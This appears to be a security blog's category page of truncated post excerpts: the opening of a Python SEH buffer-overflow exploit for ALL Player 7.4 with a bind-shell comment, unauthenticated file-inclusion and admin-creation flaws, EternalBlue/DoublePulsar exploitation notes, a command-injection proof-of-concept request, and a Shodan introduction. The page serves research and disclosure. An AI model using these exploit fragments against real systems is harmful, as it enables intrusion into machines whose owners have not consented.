Category: Research

#!/usr/bin/python # Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) # Version: 7.4 # Date: 15-08-2017 # Exploit Author: f3ci # Tested on: Windows 7 SP1 x86 head = “http://” seh = “\x0f\x47” #0x0047000f nseh = “\x61\x41” #popad align junk = “\x41” * 301 junk2 = “\x41” * 45 #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e […]

Local File Inclusion ———————————————- Normal Request: We can download another file with change the value on filename parameter and we can send this request without login. Example: Add User Account with Admin Privilege without Login ———————————————- We can create user and give admin privilege to user which we have made without login. Because this app […]

EternalBlue dapat digunakan untuk melakukan eksploitasi pada layanan Server Message Block (SMB) tanpa membutuhkan proses otentikasi. Kemudian ditambah dengan menggunakan DoublePulsar untuk mengirim sekaligus mengeksekusi malicious Dynamic-Link Libraries (DLL) atau raw shellcode pada komputer korban. Berikut contoh percobaan eksploitasi pada layanan Server Message Block (SMB) menggunakan EternalBlue dan DoublePulsar. Percobaan ini dilakukan dengan membuat malicious […]

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]

Have you ever heard SHODAN Search Engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners. SHODAN also lets you use boolean operators (‘+’, ‘-‘ and ‘|’) to […]